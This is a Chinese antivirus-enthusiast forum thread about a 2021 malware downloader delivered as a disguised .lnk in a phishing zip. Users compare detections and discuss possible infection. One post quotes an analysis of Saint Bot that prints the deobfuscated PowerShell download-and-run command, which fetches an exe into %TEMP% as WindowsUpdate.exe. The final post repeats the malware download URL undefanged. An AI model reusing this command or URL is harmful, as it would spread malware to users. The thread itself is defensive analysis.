#Downloader（2021.4）

hsks

正在缓冲 发表于 2021-4-10 13:37
https://s.threatbook.cn/report/file/891f526fea4d9490a8899ce895ce86af102a09a50b40507645fee0cf2ab5be ...

学会与病毒共生（误）

anthonyqian

诺顿 4个

正在缓冲

hsks 发表于 2021-4-10 13:38
学会与病毒共生（误）

开avast病毒扫描了，高敏感度

温馨小屋

正在缓冲 发表于 2021-4-10 13:37
https://s.threatbook.cn/report/file/891f526fea4d9490a8899ce895ce86af102a09a50b40507645fee0cf2ab5be ...

凉了，我试了试在排除文件反病毒的情况下卡巴会miss，估计我也中了，不过虚拟机里看病毒进程几秒钟就退了，期望卡巴过几天能完整入库衍生物及内存特征吧


每天一遍快速扫描。

hsks

温馨小屋 发表于 2021-4-10 13:47
凉了，我试了试在排除文件反病毒的情况下卡巴会miss，估计我也中了，不过虚拟机里看病毒进程几秒钟就退了 ...

反正我开智量火绒360都运行两次了
360提示什么我就放行（火绒和智量都没提示）

温馨小屋

hsks 发表于 2021-4-10 13:49
反正我开智量火绒360都运行两次了
360提示什么我就放行（火绒和智量都没提示）

卡巴只有文件反病毒会处理这类lnk，似乎SW不会做针对处理，也许是没行为，我也看到powershell进程出来了

正在缓冲

温馨小屋 发表于 2021-4-10 13:47
凉了，我试了试在排除文件反病毒的情况下卡巴会miss，估计我也中了，不过虚拟机里看病毒进程几秒钟就退了 ...

运行后会有Windows命令处理程序，刚刚实体机不小心运行后我立刻打开任务管理器，发现并没有“Windows命令处理程序”。
avast全面病毒扫描也没扫出来什么，但我不敢确定病毒没有运行……

只能和这个系统说拜拜了

温馨小屋

正在缓冲 发表于 2021-4-10 13:53
运行后会有Windows命令处理程序，刚刚实体机不小心运行后我立刻打开任务管理器，发现并没有“Windows命令 ...

我实体机点也没看到，虚拟机里点任务栏会闪过一个图标，实机没看见，我也不确定病毒有没有运行。

不慌，我之前装BD都是实机点毒，最后也没发现有啥问题
一般APT所有产物在两三天之内卡巴都会拉黑。

hsks

温馨小屋 发表于 2021-4-10 13:55
我实体机点也没看到，虚拟机里点任务栏会闪过一个图标，实机没看见，我也不确定病毒有没有运行。

不慌 ...

在2021年3月下旬，Malwarebytes分析师发现了一封网络钓鱼电子邮件，其中包含包含陌生恶意软件的zip文件。该zip文件中包含一个PowerShell脚本，该脚本伪装成指向比特币钱包的链接。经过分析，混淆的PowerShell下载程序启动了一系列感染，导致了一种鲜为人知的名为Saint Bot的恶意软件。
此分析将专用于我们发现的通过网络钓鱼电子邮件分发的示例。它带有一个ZIP附件：bitcoin.zip，诱使受害者有机会访问比特币钱包。
如果我们尝试通过Windows上可用的各种工具预览.lnk，则似乎会导致“ C：\ Windows \ System32 \ cmd.exe”。

但是仔细观察后发现，实际上它包含的是恶意的PowerShell脚本，旨在从嵌入式链接下载恶意软件的下一阶段：

http：// 68468438438 [。] xyz / soft / win230321 [。] exe
去混淆的脚本：

&& C：\ Windows \ System32 \ cmd.exe / c poweRshELL.eXE -w 1 $ env：SEE_MASK_NOZONECHECKS = 1;
关键模块的运输工具；STArt-bITsTRANSFER-源“（'http：// 68468438438 [。] xyz / soft / win230321.exe'）”-目标$ ENV：TEMP \ WindowsUpdate.exe;
。（'cd'）$ {eNv：TEMP};
./WindowsUpdate.exe!%SystemRoot%\System32\SHELL32.dll
下一阶段的二进制文件以WindowsUpdate.exe的名称下载到％TEMP％文件夹中，然后从那里运行。


看BLOG可能c2挂了

衍生物我发了

温馨小屋

hsks 发表于 2021-4-10 13:59
在2021年3月下旬，Malwarebytes分析师发现了一封网络钓鱼电子邮件，其中包含包含陌生恶意软件的zip文件。 ...

这个网站确实挂了

http://68468438438.xyz/soft/win230321.exe